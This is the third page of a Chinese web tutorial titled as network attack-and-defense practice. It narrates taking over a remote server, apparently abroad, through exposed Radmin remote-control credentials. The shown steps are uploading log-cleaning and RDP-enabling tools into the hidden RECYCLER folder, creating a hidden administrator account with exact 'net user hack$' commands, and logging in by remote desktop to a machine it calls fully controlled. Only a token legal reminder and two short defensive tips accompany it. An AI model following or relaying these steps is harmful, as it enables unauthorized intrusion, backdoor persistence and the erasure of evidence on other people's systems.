WEB开发网
开发学院网络安全安全技术 网络攻防实战:通过远控配置的实施的网络渗透 阅读

网络攻防实战:通过远控配置的实施的网络渗透

 2009-01-08 13:51:51 来源:WEB开发网   
核心提示: 图6使用telnet方式登录7.上传工具软件在Radmin客户端中选中保加利亚的计算机,然后在弹出的菜单单击“文件传输”,网络攻防实战:通过远控配置的实施的网络渗透(3),把需要用到的AIO清理记录和开3389远程连接的小工具传输过去,传输文件的时候最好传输到系统目

网络攻防实战:通过远控配置的实施的网络渗透

图6使用telnet方式登录

7.上传工具软件

在Radmin客户端中选中保加利亚的计算机,然后在弹出的菜单单击“文件传输”,把需要用到的AIO清理记录和开3389远程连接的小工具传输过去。传输文件的时候最好传输到系统目录下如RECYCLER,一般此目录为隐藏目录。如图7所示。

网络攻防实战:通过远控配置的实施的网络渗透

图7传输工具软件到目标服务器

8.添加用户

我们现在转回到telnet命令行模式,执行添加用户命令“net user hack$ nohack /add”,然后再执行添加用户到管理员组命令“net localgroup adminstrators hack$ /add”,最后在显示一下管理组中的用户“net localgroup administrators”,回显结果如图8所示。

网络攻防实战:通过远控配置的实施的网络渗透

图8添加管理员用户成功

9.开放3389

再运行一下开3389的小工具,ok,开3389端口成功,如图9所示。

网络攻防实战:通过远控配置的实施的网络渗透

图9在肉鸡上开放33389端口

10.使用远程桌面连接3389

再打开远程桌面窗口,依次单击“开始”—“运行”在运行框中输入“mstsc”,会弹出如图10所示的远程桌面连接窗口。

网络攻防实战:通过远控配置的实施的网络渗透

图10使用远程桌面连接

在远程桌面连接的“计算机”中输入IP地址“87.118.174.*”,然后单击连接,进行3389登录测试,很快出现了一个登录界面,在“用户名”里面输入“hack$”,在“密码”中输入“nohack”单击“ok”按钮登录,如图11所示。

网络攻防实战:通过远控配置的实施的网络渗透

图11登录远程终端

进去之后我们在查看一下这台机器的信息!如图12所示。

网络攻防实战:通过远控配置的实施的网络渗透

图12查看服务器的相关信息

至此,这台机器已经完全被控制!(友情提醒,请遵守互联网法律!)

就个人经验而言,对本次的安全渗透做如下建议:

1.使用电驴的时候请注意共享文件的设置

2.用远控软件的时候,请不要把密码等敏感信息作为注释!

最后感谢安天365团队(antian365.com)给予石头的帮助!尽管外面寒风呼啸,最近的变故也让我的心瓦凉瓦凉的,在这里我却找到了久违的温暖,有一群良师益友!

上一页  1 2 3 

Tags:网络 攻防 实战

编辑录入:爽爽 [复制链接] [打 印]
赞助商链接